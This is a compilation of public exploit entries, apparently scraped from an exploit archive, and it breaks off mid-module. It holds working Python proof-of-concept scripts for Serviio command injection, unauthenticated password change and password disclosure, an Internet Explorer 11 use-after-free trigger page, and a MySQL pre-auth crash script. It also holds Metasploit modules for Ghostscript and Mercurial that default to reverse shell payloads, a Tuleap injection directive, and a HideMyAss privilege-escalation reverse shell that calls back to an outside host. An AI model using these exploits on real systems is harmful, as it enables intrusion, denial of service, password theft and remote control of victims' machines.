#        ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
#        i18n[0] = new ProcessExecutorParameter("cmd");
#        i18n[1] = new ProcessExecutorParameter("/C");
#        for (int counter = 0; counter < this.commandArguments.length; ++counter) {
#            ProcessExecutorParameter argument = this.commandArguments[counter];
#            String envName = "JENV_" + counter;
#            i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
#            boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
#            if (!quotesNeededForWindows) {
#                argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
#            }
#            newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
#        }
#        this.commandArguments = i18n;
#        String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
#        newEnv.put("HOMEDRIVE", tempPath[0]);
#        newEnv.put("HOMEPATH", tempPath[1]);
#        newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
#        if (log.isTraceEnabled()) {
#            log.trace(String.format("Env variables: %s", newEnv.toString()));
#        }
#        return newEnv;
#    }
#
#    private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
#        return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
#    }
#
#    protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
#        boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
#        return quotesNeeded;
#    }
#
#    private String escapeAmpersandForWindows(String value) {
#        return value.replaceAll("&", "^&");
#    }
#
# =================================================================================
#
# Tested on: Restlet-Framework/2.2
#            Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#            Java/1.8.0_121
#            Java/1.8.0_111
#            Java/1.8.0_91
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5408
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#


#
# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
# output in it and start a calc.exe child process as nt authority\system.
#

from urllib2 import Request, urlopen
import sys

if (len(sys.argv) <= 1):
        print '[*] Usage: serviio_rce.py <ip address>'
        exit(0)

host = sys.argv[1]

values = """
<action>
    <name>checkStreamUrl</name>
    <parameter>VIDEO</parameter>
    <parameter>1.2.3.4&#x27;&#x5c;"&#x60;&&#x77;&#x68;&#x6f;&#x61;&#x6d;&#x69;&#x20;>&#x74;&#x65;&#x73;&#x74;&#x69;&#x6e;&#x67;&#x75;&#x73;&#x33;&#x2e;&#x74;&#x78;&#x74;&&&#x63;&#x61;&#x6c;&#x63;&&#x60;&#x27;</parameter>
</action>"""

headers = {
  'Content-Type': 'application/xml',
  'Accept': 'application/xml'
}
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)

response_body = urlopen(request).read()
print response_body


'''
Raw request:

POST /rest/action HTTP/1.1
Host: 10.211.55.3:23423
Content-Length: 93
Accept: application/json, text/plain, */*
Origin: http://10.211.55.3:23423
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://10.211.55.3:23423/console/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
DNT: 1
Connection: close

{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}

'''
HireHackking 
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an unauthenticated password modification vulnerability due to improper access
# control enforcement of the Configuration REST API. A remote attacker can exploit this,
# via a specially crafted request, to change the login password for the mediabrowser protected
# page.
#
# Tested on: Restlet-Framework/2.2
#            Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#            Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#            Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5407
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#


import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen

if (len(sys.argv) <= 3):
        print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
        print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
        exit(0)

host = sys.argv[1]
port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
lozi = sys.argv[3]

values = """
<remoteAccess>
    <remoteUserPassword>{0}</remoteUserPassword>
    <preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
    <portMappingEnabled>true</portMappingEnabled>
    <externalAddress>myserviio.dyndns.com</externalAddress>
</remoteAccess>"""

put = values.format(lozi)

headers = {
  'Content-Type': 'application/xml',
  'Accept': 'application/xml'
}
request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
request.get_method = lambda: 'PUT'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)

for errorcode in roottree.iter('errorCode'):
     print "\nReceived error code: "+errorcode.text

print 'Password successfully changed to: '+lozi
print 'Go to: http://'+host+':23424/mediabrowser\n'
HireHackking 
Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation


Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO

Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.

Desc: The application suffers from an unquoted search path issue impacting the service
'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
allow an authorized but non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the local user to be able to
insert their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot. If successful, the
local user’s code would execute with the elevated privileges of the application.

Serviio also suffers from improper permissions which can be used by a simple authenticated user
that can change the executable file with a binary of choice. The vulnerability exist due to the
improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
its sub-directories.


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5405
Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094


12.12.2016

---


C:\>sc qc Serviio
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Serviio
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Serviio\bin\ServiioService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Serviio
        DEPENDENCIES       : HTTP
        SERVICE_START_NAME : LocalSystem

C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
                                                NT AUTHORITY\SYSTEM:(I)(F)
                                                BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files

C:\>
HireHackking 
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Vendor:
# "Security:
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
# so that you can be sure your content is only accessed by you. Make sure you keep your password
# secure."
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an information disclosure vulnerability due to improper access control enforcement
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
# via a specially crafted request, to gain access to potentially sensitive information.
#
# Tested on: Restlet-Framework/2.2
#            Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#            Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#            Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5404
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#


import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen

if (len(sys.argv) <= 2):
        print '[*] Usage: serviio_id.py <ip address> <port>'
        print '[*] Example: serviio_id.py 10.211.55.3 23423'
        exit(0)

host = sys.argv[1]
port = sys.argv[2]

headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
print '\nPrinting ServiioLinks:'
print '----------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)

for URLs in roottree.iter('serviioLink'):
     print URLs.text

print

headers = {'Accept': 'application/xml'}
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
print '\nPrinting directories:'
print '---------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)

for URLs in roottree.iter('path'):
     print URLs.text

print

headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
print '\nPrinting mediabrowser password:'
print '-------------------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)

for URLs in roottree.iter('remoteUserPassword'):
     print URLs.text

print


'''
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423         

Printing ServiioLinks:
----------------------

serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource


Printing directories:
---------------------

/etc/apache2
/etc/asl
/etc/cups
/etc/defaults
/etc/emond.d
/etc/mach_init.d
/etc/mach_init_per_login_session.d
/etc/mach_init_per_user.d
/etc/manpaths.d
/etc/newsyslog.d
/etc/openldap
/etc/pam.d
/etc/paths.d
/etc/periodic
/etc/pf.anchors
/etc/postfix
/etc/ppp
/etc/racoon
/etc/security
/etc/snmp
/etc/ssh
/etc/ssl
/etc/sudoers.d


Printing mediabrowser password:
-------------------------------

s3cr3to

rewt@zslab:~#
'''
HireHackking 
<!DOCTYPE html>
<html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:black;
        font-color:red;
   };
  </style>
  
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
  
    /********************************
     *  Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
     *  Google Dork: n/a
     *  Date: 03.05.2017
     *  Exploit Author: Marcin Ressel 
     *  TT: @r_esselm
     *  Vendor Homepage: www.microsoft.com
     *  Software Link: n/a
     *  Version: 11.0.9600.18638
     *  Tested on: Windows 7
     *  CVE : n/a
     *  ****************************
        (151c.10a4): Access violation - code c0000005 (first chance)
        First chance exceptions are reported before any exception handling.
        This exception may be expected and handled.
        eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
        eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0         nv up ei pl nz na po nc
        cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
        MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
        706af750 ff36            push    dword ptr [esi]      ds:002b:1195cfa0=????????
        0:007> !heap -p -a @esi
               address 1195cfa0 found in
               _DPH_HEAP_ROOT @ 9f61000
               in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                        ef4230c:         1195c000             2000
        743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
        76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
        76f4a863 ntdll!RtlpFreeHeap+0x0000005d
        76ef2bd5 ntdll!RtlFreeHeap+0x00000142
        769c14ad kernel32!HeapFree+0x00000014
        707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
        6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
        7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
        702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
        702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
        700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
        700c5484 MSHTML!CFrameSite::Passivate+0x00000024
        6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
        6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
        705517cb MSHTML!CBase::JSBind_Release+0x00000050
        6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
        6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
        6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
        6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
        6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
        6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
        6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
        6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
        6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
        6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
        6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
        709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
        7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
        706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
        7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
        70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
        7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
 * 
 */ 
  
    var ref = [];
    var doc = null;
    var dom = null;
    var trg = null;
    var trg_parent = null;
    var text_r = null;
    var select_o = null;
    
    function handle() {
    
                try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
                try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
                try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
                try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
                try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
                try{text_r.select();}catch(e){}
                try{tree_r.setEnd(ref[0],0);}catch(e){}
                try{select_o.selectAllChildren(doc.body);}catch(e){}
                try{tree_r.surroundContents(ref[0]);}catch(e){}
                try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
                try{tree_r.selectNodeContents(document.body);}catch(e){}
                try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
                
    }
  
  
    function testcase() {
    
             var  e1f = document.getElementById("e1");
				     doc = document.getElementById("t1").contentWindow.document; 
				     
             e = e1f.contentWindow.document.createElement("ins"); 
				     e.cite = 'about:blank';
				     rf = doc.body.appendChild(e); 
				     ref.push(rf); 
				     e = e1f.contentWindow.document.createElement("iframe");
				     rf = doc.body.appendChild(e); 
				     ref.push(rf); 
             
				     dom = doc.getElementsByTagName("*"); 
				     trg = dom[3]; 
             trg_parent = doc.body;
             text_r = doc.body.createTextRange(); 
			       tree_r = doc.createRange(); 
		 	       tree_r.setStart(trg,0); 
				     tree_r.setEnd(trg,0);
             select_o = window.getSelection(); 
    
             var ob = new MutationObserver(handle);
                 ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true }); 
   
           	try { 
                trg.insertBefore(document.createElement("div"),ref[1]);    
            } catch(e) {}
		   
            doc.adoptNode(trg.attributes[0]);
		        trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "&Agrave;";
		        tmp = trg;
  }
  
  </script>
  <title>IE11  MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
  </body>
</html>
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit

  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Ghostscript Type Confusion Arbitrary Command Execution',
      'Description'     => %q{
        This module exploits a type confusion vulnerability in Ghostscript that can
        be exploited to obtain arbitrary command execution. This vulnerability affects
        Ghostscript version 9.21 and earlier and can be exploited through libraries
        such as ImageMagick and Pillow.
      },
      'Author'          => [
        'Atlassian Security Team', # Vulnerability discovery
        'hdm'                      # Metasploit module
      ],
      'References'      => [
        %w{CVE 2017-8291},
        %w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
        %w{URL http://seclists.org/oss-sec/2017/q2/148},
        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
      ],
      'DisclosureDate'  => 'Apr 27 2017',
      'License'         => MSF_LICENSE,
      'Platform'        => 'unix',
      'Arch'            => ARCH_CMD,
      'Privileged'      => false,
      'Payload'         => {
        'BadChars'      => "\x22\x27\x5c)(", # ", ', \, (, and )
        'Compat'        => {
          'PayloadType' => 'cmd cmd_bash',
          'RequiredCmd' => 'generic netcat bash-tcp'
        }
      },
      'Targets'         => [
        ['EPS file',  template: 'msf.eps']
      ],
      'DefaultTarget'   => 0,
      'DefaultOptions'  => {
        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
        'LHOST'                 => Rex::Socket.source_address,
        'DisablePayloadHandler' => false,
        'WfsDelay'              => 9001
      }
    ))

    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
    ])
  end

  # Example usage from the bug tracker:
  # $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps

  def exploit
    file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
  end

  def template
    ::File.read(File.join(
      Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
      target[:template]
    ))
  end

end
HireHackking 
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''

import socket 
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.

https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/

Rodrigo Marcos

'''

if len(sys.argv)<2:

	print "Usage: python " + sys.argv[0] + " host [port]"
	exit(0)

else:
	HOST = sys.argv[1]

	if len(sys.argv)>2:
		PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
	else:
		PORT = 3306

print "[+] Creating packet..."

'''
3 bytes		Packet lenth
1 bytes 	Packet number

Login request:

Packet format (when the server is 4.1 or newer):

Bytes       Content
-----       ----
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)

'''

# packet_len = '\x64\x00\x00'

packet_num = '\x01'

#Login request packet
packet_cap = '\x85\xa2\xbf\x01'		# client capabilities (default)
packet_max = '\x00\x00\x00\x01'		# max packet size (default)
packet_cset = '\x21'				# charset (default)
p_reserved = '\x00' * 23 			# 23 bytes reserved with nulls (default)
packet_usr =  'test\x00' 			# username null terminated (default)

packet_auth  = '\xff'			# both \xff and \xfe crash the server

'''
Conditions to crash:

1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars

The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth 
packet_len = pack('i',len(packet))[:3]

request = packet_len + packet_num + packet

print "[+] Connecting to host..."
try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))
	print "[+] Connected."

except:
	print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."	
	s.close()
	print "[+] Exiting."
	exit(0)

print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."

print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request

s.close()
HireHackking 
# Tuleap - Command Injection in Project Wiki

**CVE:** CVE-2017-7981

**CVSSv3:** 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)

**Versions affected:** >= 8.3 and <= 9.6.99.86

## Introduction

Tuleap is a Libre suite to plan, track, code and collaborate on software
projects. Tuleap helps development teams to build awesome applications,
better, faster, easier.

## Background

Tuleap uses PHPWiki as a plugin to provide a weak feature for
projects. The version of PHPWiki used is 1.3.10. This version contains a
command injection vulnerability in the SyntaxHighlighter plugin. Other
applications that use PHPWiki similar to Tuleap will also be affected
by this issue.

The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.

## Vulnerability

Authenticated users, including unprivileged users, with access to a
project containing a wiki, can exploit this command injection
(CI) vulnerability to gain remote unauthorised access to the server
hosting the Tuleap web application.

RCE is achieved by entering a SyntaxHighlighter plugin directive in a
new wiki page on any wiki available in any project. The SyntaxHighligter
plugin in vulnerable versions of PHPWiki passes the `syntax` argument
to the `proc_open()` PHP builtin function which spawns a process in the
operating system running the web application.

The following is an example plugin directie which would cause the `id(1)`
command to be executed on a Linux server running an affected version
of Tuleap.

```
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
```

The result of the command execution can be seen in the image below.

![command execution](2017.04.tuleap-auth-ci.command-exec.png)

## Versions Affected

This vulnerability has existed in the version of PHPWiki used by the
Tuleap project since at least version 8.3 through to 9.6.99.86.

## References

https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md

https://tuleap.net/plugins/tracker/?aid=10159

## Credit

This vulnerability was discovered by Ben N (pajexali@gmail.com) 19
April 2017.
HireHackking 
Source: https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html

Abstract
A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature check's on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.


Tested versions:
This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS.


Fix:
There is currently no fix available.


Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for macOS. It was discovered that version 3.x of HMA Pro VPN for macOS is affected by local privilege escalation.


Details:
The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings.

The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature check's on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.

/advisory/SFY20170408/runopenvpnasroot.png
/advisory/SFY20170408/startopenvpn.png


Proof of Concept:
1) Create an Python script named openvpn and make sure it is executable (chmod u+x).

#!/usr/bin/python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

2) Replace the openvpn binary located in the path below with this Python script.

/Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/

3) Wait until the victim opens a VPN connection.
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
      'Description'    => %q{
        This module takes advantage of custom hg-ssh wrapper implementations that don't
        adequately validate parameters passed to the hg binary, allowing users to trigger a
        Python Debugger session, which allows arbitrary Python code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'claudijd',
        ],
      'References'     =>
        [
          ['URL',   'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
        ],
      'DefaultOptions' =>
        {
          'Payload' => 'python/meterpreter/reverse_tcp',
        },
      'Platform'       => ['python'],
      'Arch'           => ARCH_PYTHON,
      'Targets'        => [ ['Automatic', {}] ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 18 2017",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22),
        OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
        OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
      ]
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def username
    datastore['USERNAME']
  end

  def ssh_priv_key
    File.read(datastore['SSH_PRIV_KEY_FILE'])
  end

  def exploit
    factory = ssh_socket_factory
    ssh_options = {
      auth_methods: ['publickey'],
      config: false,
      use_agent: false,
      key_data: [ ssh_priv_key ],
      port: rport,
      proxy: factory,
      non_interactive:  true
    }

    ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    print_status("#{rhost}:#{rport} - Attempting to login...")

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, username, ssh_options)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
